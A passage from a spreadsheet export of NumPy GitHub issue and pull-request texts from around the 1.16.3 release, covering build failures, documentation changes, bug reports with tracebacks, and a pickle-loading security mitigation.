     PyStructSequence_InitType2(PyTypeObject *type, PyStructSequence_Desc *desc) {_x000D_
         PyStructSequence_InitType(type, desc);_x000D_
```</t>
  </si>
  <si>
    <t>numpy-1.16.3 fails to build on pypy3 win32</t>
  </si>
  <si>
    <t xml:space="preserve">- Add 1.16.3 release notes_x000D_
- Add 1.16.3 changelog_x000D_
- Update mailmap_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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DOC: Post 1.16.3 release updates</t>
  </si>
  <si>
    <t xml:space="preserve">- Update mailmap_x000D_
- Prepare the release notes_x000D_
- Create the changelog._x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Prepare for the NumPy release.</t>
  </si>
  <si>
    <t>See https://github.com/numpy/numpy/pull/9977#issuecomment-484047077 for reported build issue with mingw-w64</t>
  </si>
  <si>
    <t>BLD: address mingw-w64 issue. Follow-up to gh-9977</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Fixes #5460 _x000D_
I have included the `HAVE_ENDIAN_H` in the Platform information section above other endian macros and made two sections named `Compiler Directives` and `Interrupt Handling` for other macros based on their use cases. I can't find one such perfect section for `NPY_UNUSED`._x000D_
Also, please let me know if I need to define or even specify the location of definition of these macros._x000D_
Thanks!_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Add missing macros to C API documentation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Intel x86_64_x000D_
Linux 3.0.101-0.47.106.59-default_x000D_
gcc 6.1.0_x000D_
python 3.6.0_x000D_
numpy 1.16.2_x000D_
_x000D_
In test_dragon4 in https://github.com/numpy/numpy/blob/master/numpy/core/tests/test_scalarprint.py there is_x000D_
_x000D_
```python_x000D_
fpos64 = lambda x, **k: np.format_float_positional(np.float64(x), **k)_x000D_
..._x000D_
assert_equal(fpos64(0.5**(1022 + 52), unique=False, precision=1074), ...)_x000D_
```_x000D_
and I get the error "E       OverflowError: (34, 'Numerical result out of range')"_x000D_
_x000D_
I think this is an error in the test.  `numpy.float64(0.5)` should be used_x000D_
instead of `0.5` which is an ordinary Python `float`, which has the_x000D_
following limits:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; sys.float_info_x000D_
sys.float_info(max=1.7976931348623157e+308, max_exp=1024, max_10_exp=308, min=2.2250738585072014e-308, min_exp=-1021, min_10_exp=-307, dig=15, mant_dig=53, epsilon=2.220446049250313e-16, radix=2, rounds=1)_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>test_scalarprint fails:  numpy.float64 should be used</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Fixes #7426_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Specify range for numpy.angle</t>
  </si>
  <si>
    <t xml:space="preserve">Previously `np.ceil` would call `o.ceil()` on each element of an object array._x000D_
_x000D_
This is inconsistent with the builtin python way of handling this, calling `o.__ceil__()`._x000D_
_x000D_
This changes these three functions to use the corresponding functions in the `math` module, which do the special method lookup._x000D_
_x000D_
As a result, they now work on arrays of `Fraction` and `Decimal` objects._x000D_
_x000D_
Fixes #13370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</si>
  <si>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BUG/ENH: Make floor, ceil, and trunc call the matching special methods</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>np.floor and np.ceil should call __floor__ and __ceil__ on object arrays</t>
  </si>
  <si>
    <t>['component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">This commit implements vectorized single precision sine and cosine using_x000D_
AVX2 and AVX512. Both sine and cosine are computed using a_x000D_
polynomial approximation which are accurate for values between_x000D_
[-PI/4,PI/4]. The original input is reduced to this range using a 3-step_x000D_
Cody-Waite's range reduction method. This method is only accurate for_x000D_
values between [-71476.0625f, 71476.0625f] for cosine and [-117435.992f,_x000D_
117435.992f] for sine. The algorithm identifies elements outside this_x000D_
range and calls glibc in a scalar loop to compute their output._x000D_
_x000D_
The algorithm is a vectorized version of the methods presented_x000D_
here: https://stackoverflow.com/questions/30463616/payne-hanek-algorithm-implementation-in-c/30465751#30465751_x000D_
_x000D_
Accuracy: maximum ULP error = 1.49_x000D_
_x000D_
Max ULP error comparison to GLIBC's implementation: _x000D_
_x000D_
| Function | GLIBC scalar | GLIBC vector (libmvec) | this patch |               _x000D_
|----------|--------------|------------------------|------------|               _x000D_
| sine     | 1.19         | 2.47                   | 1.49       |               _x000D_
| cosine   | 1.19         | 2.39                   | 1.49       |               _x000D_
_x000D_
Performance: The speed-up this implementation provides is dependent on_x000D_
the values of the input array. AVX512 version performs nearly 22x faster when all the input_x000D_
values are within the range specified above. Details of the performance_x000D_
benefits are provided in the commit message. Its worst performance is when all the array_x000D_
elements are outside the range leading to about 1% reduction in_x000D_
performance._x000D_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</si>
  <si>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Use AVX for float32 implementation of np.sin &amp; np.cos</t>
  </si>
  <si>
    <t>Following discussion in the weekly dev meetings about missing merge policy and general developer guidelines, I reworked the developer document layout and added content adapted from [`scikit-image`](https://github.com/scikit-image/scikit-image/blob/64103e6c90917fcfdef8343fd7dd4df32c910446/CONTRIBUTING.txt)</t>
  </si>
  <si>
    <t>DOC: reorganize developer docs, use scikit-image as a base for change</t>
  </si>
  <si>
    <t xml:space="preserve">* Add missing headers that happened to be included before this file_x000D_
* Fix accidentally exported symbols_x000D_
* Move registering types in `multiarray.__dict__` to the source file that creates the types_x000D_
_x000D_
Extracted from #12473 </t>
  </si>
  <si>
    <t>BUG/MAINT: Tidy typeinfo.h and .c</t>
  </si>
  <si>
    <t>I get the error above, with the "IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!" text. None of it seems to be relevant._x000D_
_x000D_
The thing that's interesting is that I'm running from a virtualenv. When I activate the virtualenv like normal, numpy imports normally. When I import with the activate_this.py, inside python, I get the error above:_x000D_
```_x000D_
_x000D_
&gt;&gt;&gt; this_file='win\\CYAN\Scripts\\activate_this.py'_x000D_
&gt;&gt;&gt; exec(open(this_file).read(), {'__file__': this_file})_x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Dropbox (CEP)\venvs\win\CYAN\Lib\site-packages\numpy\core\__init__.py", line 40, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "C:\Dropbox (CEP)\venvs\win\CYAN\Lib\site-packages\numpy\core\multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "C:\Dropbox (CEP)\venvs\win\CYAN\Lib\site-packages\numpy\core\overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath'_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\Dropbox (CEP)\venvs\win\CYAN\Lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "C:\Dropbox (CEP)\venvs\win\CYAN\Lib\site-packages\numpy\core\__init__.py", line 71, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
_x000D_
IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
_x000D_
```_x000D_
etc_x000D_
_x000D_
_x000D_
_x000D_
I'm using the same python in both cases:_x000D_
```_x000D_
&gt;&gt;&gt; sys.executable_x000D_
'C:\\Python37\\python.exe'_x000D_
```_x000D_
which is 64b, in case that matters.</t>
  </si>
  <si>
    <t>No module named 'numpy.core._multiarray_umath'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
On reviewing the code of `numpy/random/mtrand/distributions.c`, we noticed that in `rk_standard_exponential`, a trick is used to mitigate the fact that `rk_double` returns [0, 1)._x000D_
_x000D_
https://github.com/numpy/numpy/blob/8f31f95910d27da75941bbbbde7ef1ecec9b0f74/numpy/random/mtrand/distributions.c#L110-L113_x000D_
_x000D_
but why isn't the same trick used in rk_laplace?_x000D_
https://github.com/numpy/numpy/blob/8f31f95910d27da75941bbbbde7ef1ecec9b0f74/numpy/random/mtrand/distributions.c#L664-L677_x000D_
_x000D_
This may lead to problem if `U == 0` since `log(U + U)` will give `-inf`._x000D_
_x000D_
CC: @dingsquared_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Current `master` (8f31f95910d27da75941bbbbde7ef1ecec9b0f74)_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Possible bug in random.laplace</t>
  </si>
  <si>
    <t>['00 - Bug', '54 - Needs decision', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12560._x000D_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</si>
  <si>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fix some doctest failures</t>
  </si>
  <si>
    <t>['04 - Documentation', '08 - Backport', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12889._x000D_
_x000D_
a partial mitigation of #12759._x000D_
_x000D_
See also https://nvd.nist.gov/vuln/detail/CVE-2019-6446_x000D_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</si>
  <si>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Make allow_pickle=False the default for loading</t>
  </si>
  <si>
    <t>['08 - Backport', '30 - API', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Test for ND transforms with axes for invariance of_x000D_
permutation of axes._x000D_
_x000D_
This is based on the test added to `mkl_fft` in https://github.com/IntelPython/mkl_fft/pull/38 but extended to `fftn`, `ifftn`, `rfftn` and `irfftn`._x000D_
_x000D_
@charris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</si>
  <si>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Added test_fftpocket.py::test_axes</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Hello, I just like to quickly point out that the proper pronunciation for numpy does not appear on the main page of the documentation.  I believe a short line would be all that is needed to cut down on the rampant mispronunciation I have observed in my career (some people really think it's pronounced num-pie and not numpee?!  Really??!!!)_x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Regards,_x000D_
James Schaffer_x000D_
</t>
  </si>
  <si>
    <t>Proper pronunciation not in documentation</t>
  </si>
  <si>
    <t>mitigates the saving part of #12759 by warning if allow_pickle not specified_x000D_
_x000D_
see also https://nvd.nist.gov/vuln/detail/CVE-2019-6446_x000D_
_x000D_
Broken out of #12889</t>
  </si>
  <si>
    <t>DEP: warn when saving requires pickle</t>
  </si>
  <si>
    <t>Forward port of #9390 from 1.13.2, which now needs backporting to 1.16.3..._x000D_
_x000D_
Fixes #13347</t>
  </si>
  <si>
    <t>BUG: Return the coefficients array directly</t>
  </si>
  <si>
    <t xml:space="preserve">In some older versions of numpy, it was possible to change the coefficients of a `poly1d` object.  Now it seems not possible.  According to https://github.com/numpy/numpy/issues/9385 I believe the coefficients should still be mutable._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import numpy_x000D_
p = numpy.poly1d((1,1))_x000D_
print(p)_x000D_
p.c[0]=0_x000D_
print(p)_x000D_
```_x000D_
Both print statements print `array([1, 1])`.  _x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
I am using numpy version 1.16.2._x000D_
</t>
  </si>
  <si>
    <t>poly1d coefficients appear to be immutable</t>
  </si>
  <si>
    <t>DOC: Document PyArray_GETITEM / PySequence_GetItem discrepancy</t>
  </si>
  <si>
    <t xml:space="preserve">This is mentioned in the release notes, so probably should be discoverable._x000D_
_x000D_
Change those references to links too._x000D_
</t>
  </si>
  <si>
    <t>DOC: Add as_ctypes_type to the documentation</t>
  </si>
  <si>
    <t>The iteration variable has to be intp of course, unfortunately_x000D_
a test is too slow to be practical (even as a slow test)._x000D_
_x000D_
This code needs more refactoring, but since it is a minimal fix..._x000D_
_x000D_
Closes gh-13286</t>
  </si>
  <si>
    <t>BUG: ufunc.at iteration variable size fix</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">As a general rule, _every_ use of `.descr` is broken._x000D_
_x000D_
Fixes #13297_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix crash when calling savetxt on a padded array</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13060._x000D_
_x000D_
Closes #7801._x000D_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</si>
  <si>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Use C call to sysctlbyname for AVX detection on MacOS.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Closes #9183 _x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Add docstrings for consistency in aliases</t>
  </si>
  <si>
    <t xml:space="preserve">when locally building documentation, the numpy version installed in python should match the version of the documentation. This adds a check that the versions match, and will indicate how to override the check if it fails._x000D_
_x000D_
Also conditionally set some options so they can be overridden by environment variables, should allow for instance `SPHINXOPTS='-n' make html` which previously did not override the empty `SPHINXOPTS` option_x000D_
_x000D_
xref #13331 </t>
  </si>
  <si>
    <t>BUILD: fail documentation build if numpy version does not match</t>
  </si>
  <si>
    <t>Previously a single-field type would decay, which is undesirable._x000D_
_x000D_
The included test previously did not pass</t>
  </si>
  <si>
    <t>BUG: Fix structured_to_unstructured on single-field types</t>
  </si>
  <si>
    <t>The main issue was that numpydoc got really picky about `See Also` sections. Also I managed to track down the last warnings that still show up in the CI doc build._x000D_
_x000D_
The ones that don't show up in the CI build but I can't get rid of no matter my version of numpydoc or removing `__call__` from `doc/source/_templates/autosummary/class.rst` are these:_x000D_
```_x000D_
/home/rgommers/code/numpy/doc/source/reference/routines.polynomials.polynomial.rst:23:&lt;autosummary&gt;:: WARNING: toctree contains reference to nonexisting document 'reference/generated/numpy.polynomial.polynomial.Polynomial.__call__'_x000D_
/home/rgommers/code/numpy/doc/source/reference/routines.testing.rst:56:&lt;autosummary&gt;:: WARNING: toctree contains reference to nonexisting document 'reference/generated/numpy.testing.suppress_warnings.__call__'_x000D_
```_x000D_
_x000D_
At least there's no difference between numpydoc versions, and the generated docs look fine._x000D_
_x000D_
EDIT: for the See Also changes of generic, here's an example of how they are rendered incorrectly at the moment: https://www.numpy.org/devdocs/reference/generated/numpy.generic.clip.html#numpy.generic.clip</t>
  </si>
  <si>
    <t>DOC, BLD: fix doc build issues in preparation for the next numpydoc release</t>
  </si>
  <si>
    <t>An example can be seen in recent doc builds:_x000D_
```_x000D_
/home/circleci/repo/venv/lib/python3.6/site-packages/numpy/core/overrides.py:150: RankWarning: Polyfit may be poorly conditioned_x000D_
  implementation, public_api, relevant_args, args, kwargs)_x000D_
/home/circleci/repo/venv/lib/python3.6/site-packages/numpy/core/overrides.py:150: RankWarning: Polyfit may be poorly conditioned_x000D_
  implementation, public_api, relevant_args, args, kwargs)_x000D_
```_x000D_
In every function that got an override, the warnings `stacklevel` needs to be increased by 1. _x000D_
_x000D_
I looked for an existing issue for this but couldn't find it. @shoyer does this need to be added to the NEP 18 tracking issue?</t>
  </si>
  <si>
    <t>Warnings need different stacklevel after NEP 18 overrides</t>
  </si>
  <si>
    <t>['component: __array_function__']</t>
  </si>
  <si>
    <t xml:space="preserve">This makes `np.add.accumulate(0, axis=())` match `np.add.accumulate(0)` - both now give `TypeError: cannot accumulate on a scalar`._x000D_
_x000D_
This also fixes an LGTM complaing about `naxes == 1` being always false due to the line before it that sets `naxes = 0`._x000D_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</si>
  <si>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Tidy up error message for accumulate and reduceat</t>
  </si>
  <si>
    <t>```python_x000D_
dt = np.dtype([('f', (int, 3))])_x000D_
a = np.zeros(3, dt)_x000D_
assert a.astype(a.dtype, copy=False).base is not None  # fails_x000D_
```</t>
  </si>
  <si>
    <t>BUG: arr.astype(arr.dtype, copy=False) makes a copy anyway on subarray types</t>
  </si>
  <si>
    <t xml:space="preserve">See discussion at https://github.com/numpy/numpy/issues/13112._x000D_
_x000D_
Currently, a field specified as `[(name, dtype, 1)]` is interpreted as_x000D_
a scalar field (i.e., the same as `[(name, dtype)]` or `[(name, dtype,_x000D_
()]`). This now raises a DeprecationWarning; in a future version, it_x000D_
will be interpreted as a shape-(1,) field, i.e. the same as `[(name,_x000D_
dtype, (1,))]` (consistently with `[(name, dtype, n)]` with `n&gt;1`, which_x000D_
is already equivalent to `[(name, dtype, (n,)]`)._x000D_
_x000D_
@eric-wieser: This currently fails test_recfunctions::TestRecFunctions::test_structured_to_unstructured (apparently an extra copy is now being made), but it's not clear to me why._x000D_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</si>
  <si>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DEP: Deprecate collapsing shape-1 dtype fields to scalars.</t>
  </si>
  <si>
    <t>This is a direct move, with some tweaks to imports._x000D_
_x000D_
This breaks a cyclic imports between `core.numeric` and `core.fromnumeric`._x000D_
_x000D_
This doesn't affect the value of `np.core.numeric.__all__` which keeps code doing `from numpy.core.numeric import *` working._x000D_
_x000D_
Similar to #13322</t>
  </si>
  <si>
    <t>MAINT: Move asarray helpers into their own module</t>
  </si>
  <si>
    <t>This is a direct move, with some tweaks to imports_x000D_
_x000D_
This works towards breaking cyclic imports through `core/numeric.py`, and makes that file a little bit shorter._x000D_
_x000D_
This doesn't affect the value of `np.core.numeric.__all__` which keeps code doing `from numpy.core.numeric import *` working._x000D_
_x000D_
Inspired by some of the ideas in #11924</t>
  </si>
  <si>
    <t>MAINT: Move umath error helpers into their own module</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>MAINT: Move exceptions from core._internal to core._exceptions</t>
  </si>
  <si>
    <t>Fixes #13315 _x000D_
_x000D_
Remove unused file `numpy/random/mtrand/generate_mtrand_c.py`</t>
  </si>
  <si>
    <t>MAINT: remove unused file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
I ran into this issue with numpy 1.15.4 when some existing code (that was very robust and working fine) started to give crazy results, and I isolated it to np.fft.rfftn.  I'm actually hoping that I'm just doing something stupid, but I can't find an error in my logic so far._x000D_
_x000D_
Since it's non-trivial to create on-the-fly example data for this, I've made some test data available in a npy file [here](https://drive.google.com/file/d/18EXh4oUzQXC9aM988BEzikHhLKfibqGl/view?usp=sharing) (simulated ocean waves).  The following code illustrates the issue - I have a cube of data which represents a simulated wave field in 3D (Time, X, Y).  I am trying to make a PSD.  Because the input data are real, I'm using rfftn.  So, I want to perform the full complex FFT along axes 1 and 2 and the conjugate symmetric FFT along axis 0._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import numpy.fft as nfft_x000D_
import matplotlib.pyplot as plt_x000D_
_x000D_
with open('waves.npy', 'rb') as fid:_x000D_
        waves = np.load(fid)_x000D_
_x000D_
goodn = nfft.rfftn(waves.T)_x000D_
good1 = nfft.rfft(waves, axis=0)_x000D_
goodn1 = nfft.rfftn(waves, axes=[0])_x000D_
goodn3 = nfft.rfftn(waves.T, axes=[0,1,2])_x000D_
_x000D_
fig, axs = plt.subplots(figsize=(8,8), ncols=2, nrows=2)_x000D_
axs[0][0].imshow(np.ma.log10(np.abs(goodn[0,:,:])**2), aspect='auto')_x000D_
axs[1][0].imshow(np.ma.log10(np.abs(good1[0,:,:])**2), aspect='auto')_x000D_
axs[1][1].imshow(np.ma.log10(np.abs(goodn1[0,:,:])**2), aspect='auto')_x000D_
axs[0][1].imshow(np.ma.log10(np.abs(goodn3[0,:,:])**2), aspect='auto')_x000D_
```_x000D_
_x000D_
All of the above actually produces plots that are correct.  In the top two plots in the image below, you can see the deep water dispersion curve._x000D_
![Figure_1](https://user-images.githubusercontent.com/9399446/56066421-8d2d2100-5d2c-11e9-9f7e-673e556fd723.png)_x000D_
_x000D_
If I transpose my data so the 'real' axis that I want to use is the last axis and use rfftn out of the box, it works - "goodn", upper left.  If I do the same thing but specify all 3 axes (without changing the order), it also works - "goodn3", upper right.  If I use rfft and specify axis=0, instead of using rfftn, I get junk because I haven't taken the transform of the X and Y dimensions - "good1", lower left.  If I do essentially the equivalent by using rfftn but only specifying axes=[0], I get the same exact junk - "goodn1", lower right._x000D_
_x000D_
### Error message:_x000D_
_x000D_
**However**, what I had been doing, and what I want to do, and from the docs I think I *should* be able to do, is this:_x000D_
_x000D_
```python_x000D_
realgood = nfft.rfftn(waves, axes=[1,2,0])_x000D_
```_x000D_
_x000D_
In an older version of numpy (at least up to 1.13), that worked perfectly.  In numpy 1.15.4, that gave me the kind of junk described above.  It looked like the X and Y axes were not actually being transformed (full complex transform) like they should be.  I thought I might get around it by upgrading to 1.16.2 ... however now what that does is give me this error:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
_x000D_
  File "&lt;ipython-input-11-3dad548cb9e8&gt;", line 1, in &lt;module&gt;_x000D_
    runfile('C:/Users/asmith/Documents/Git/python_utils/scripts/gist.py', wdir='C:/Users/asmith/Documents/Git/python_utils/scripts')_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 786, in runfile_x000D_
    execfile(filename, namespace)_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 110, in execfile_x000D_
    exec(compile(f.read(), filename, 'exec'), namespace)_x000D_
_x000D_
  File "C:/Users/asmith/Documents/Git/python_utils/scripts/gist.py", line 57, in &lt;module&gt;_x000D_
    realgood = nfft.rfftn(waves, axes=[1,2,0])_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\mkl_fft\_numpy_fft.py", line 1043, in rfftn_x000D_
    output = mkl_fft.rfftn_numpy(a, s, axes)_x000D_
_x000D_
  File "mkl_fft\_pydfti.pyx", line 947, in mkl_fft._pydfti.rfftn_numpy_x000D_
_x000D_
  File "mkl_fft\_pydfti.pyx", line 846, in mkl_fft._pydfti._fftnd_impl_x000D_
_x000D_
  File "mkl_fft\_pydfti.pyx", line 724, in mkl_fft._pydfti._iter_fftnd_x000D_
_x000D_
  File "mkl_fft\_pydfti.pyx", line 667, in mkl_fft._pydfti._init_nd_shape_and_axes_x000D_
_x000D_
ValueError: all axes must be unique_x000D_
```_x000D_
_x000D_
If I switch the two spatial axes (which should be the same, yes? Axes 1 and 2 are the same size), I get a different error:_x000D_
_x000D_
```python_x000D_
realgood = nfft.rfftn(waves, axes=[2,1,0])_x000D_
```_x000D_
gives me this:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
_x000D_
  File "&lt;ipython-input-15-3dad548cb9e8&gt;", line 1, in &lt;module&gt;_x000D_
    runfile('C:/Users/asmith/Documents/Git/python_utils/scripts/gist.py', wdir='C:/Users/asmith/Documents/Git/python_utils/scripts')_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 786, in runfile_x000D_
    execfile(filename, namespace)_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 110, in execfile_x000D_
    exec(compile(f.read(), filename, 'exec'), namespace)_x000D_
_x000D_
  File "C:/Users/asmith/Documents/Git/python_utils/scripts/gist.py", line 57, in &lt;module&gt;_x000D_
    realgood = nfft.rfftn(waves, axes=[2,1,0])_x000D_
_x000D_
  File "C:\Users\asmith\AppData\Local\Continuum\anaconda3\lib\site-packages\mkl_fft\_numpy_fft.py", line 1043, in rfftn_x000D_
    output = mkl_fft.rfftn_numpy(a, s, axes)_x000D_
_x000D_
  File "mkl_fft\_pydfti.pyx", line 951, in mkl_fft._pydfti.rfftn_numpy_x000D_
_x000D_
ValueError: could not broadcast input array from shape (512,64) into shape (512,512)_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.16.2 3.7.3 (default, Mar 27 2019, 17:13:21) [MSC v.1915 64 bit (AMD64)]_x000D_
</t>
  </si>
  <si>
    <t>rfftn axes specification no longer works</t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: Added anti-diagonal examples to `np.diagonal` and `np.fill_diagonal`_x000D_
</t>
  </si>
  <si>
    <t>DOC: Added anti-diagonal examples to np.diagonal and np.fill_diagonal</t>
  </si>
  <si>
    <t>xref #13163 _x000D_
_x000D_
Does anyone know what is ['numpy/random/mtrand/generate_mtrand_c.py'](https://github.com/numpy/numpy/blob/v1.16.2/numpy/random/mtrand/generate_mtrand_c.py) and why it is in ['MANIFEST.in'](https://github.com/numpy/numpy/blob/v1.16.2/MANIFEST.in#L11) ? Is it used by some downstream package? It does not seem to be used in [creating the wheels](https://github.com/MacPython/numpy-wheels)</t>
  </si>
  <si>
    <t>BUILD: what is generate_mtrand_c.py ?</t>
  </si>
  <si>
    <t>Thanks to @mattip for pointing this out. The removed bit is a copy_x000D_
of what's on the main governance page (where it belongs)._x000D_
So just deleting here._x000D_
_x000D_
[ci skip] [skip ci]_x000D_
**no ci**</t>
  </si>
  <si>
    <t>DOC: remove misplaced section at bottom of governance people page</t>
  </si>
  <si>
    <t>Found by LGTM</t>
  </si>
  <si>
    <t>MAINT: fix typo in 'self'</t>
  </si>
  <si>
    <t>Mostly indentation changes_x000D_
_x000D_
Fixes gh-13200</t>
  </si>
  <si>
    <t>BUG: Close files if an error occurs in genfromtxt</t>
  </si>
  <si>
    <t xml:space="preserve">This previously raisd `OSError: [Errno 22] Invalid argument` while trying to seek to byte -1 of the file._x000D_
_x000D_
It now raises `ValueError: cannot mmap an empty file`_x000D_
_x000D_
The simple fix is not to write the file at all if we know it's already long enough._x000D_
_x000D_
In future we could consider allowing memmap to do an extra write behind the scenes to ensure the fiel is not empty, but that seems out of scope._x000D_
_x000D_
Fixes gh-12653_x000D_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</si>
  <si>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bad error message in np.memmap</t>
  </si>
  <si>
    <t xml:space="preserve">These are used by PyPI and other services._x000D_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</si>
  <si>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Add project_urls to setup</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', 'component: build']</t>
  </si>
  <si>
    <t>It was pointed out to me that it makes more sense to list the company, rather than a division or program inside that company. _x000D_
(follow up to gh-13289)_x000D_
_x000D_
Also fix a broken link I found._x000D_
_x000D_
```_x000D_
[ci skip]_x000D_
[skip ci]_x000D_
**no ci**_x000D_
```</t>
  </si>
  <si>
    <t>DOC: list Quansight rather than Quansight Labs as Institutional Partner.</t>
  </si>
  <si>
    <t xml:space="preserve"> I am really not sure if this is the best place to place this message and if it is the good call to suppress other debug info. _x000D_
_x000D_
Closes #13225._x000D_
&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>MAINT:  better MemoryError message (#13225)</t>
  </si>
  <si>
    <t>Fixes #12974_x000D_
_x000D_
This includes two minor changes to NEP-18 that will need to be implemented in NumPy:_x000D_
- The ``__numpy_implementation__`` attribute is documented and officially_x000D_
  supported as a way to defer to NumPy's own implementation._x000D_
- I have noted that dispatcher functions should be given the same name as_x000D_
  implementations, which should result in more interprettable error messages.</t>
  </si>
  <si>
    <t>NEP: Update NEP-18 to include the ``__skip_array_function__`` attribute.</t>
  </si>
  <si>
    <t xml:space="preserve">If I run the simple code below, one of our computers completely freezes for 5-10 seconds and then reboots. This happens **only** on a machine with Intel **i9-7980XE** 18 cores cpu,  and Anaconda3-2019.03-Linux-x86_64.sh installed (running on  Ubuntu 18.04.2 LTS,). The same Conda/Ubuntu environment with an  **i7-7700** 4 cores cpu has no problems. This happens on the python command line and on a Jupyter notebook._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
A = np.matrix([[1.], [3.]])_x000D_
B = np.matrix([[2., 3.]])_x000D_
np.dot(A, B)_x000D_
```_x000D_
Note 1: For one week, I tried without success several combinations of (re)installing different Anaconda versions, updating and downgrading mkl, blas etc. I started to find a "solution" on the references below, but in my case it's **not** a virtual environment:_x000D_
_x000D_
* https://github.com/numpy/numpy/issues/11517_x000D_
* https://github.com/xianyi/OpenBLAS/issues/2067 (I reported here yesterday, as well)._x000D_
_x000D_
A "partial" solution that worked for me was:_x000D_
_x000D_
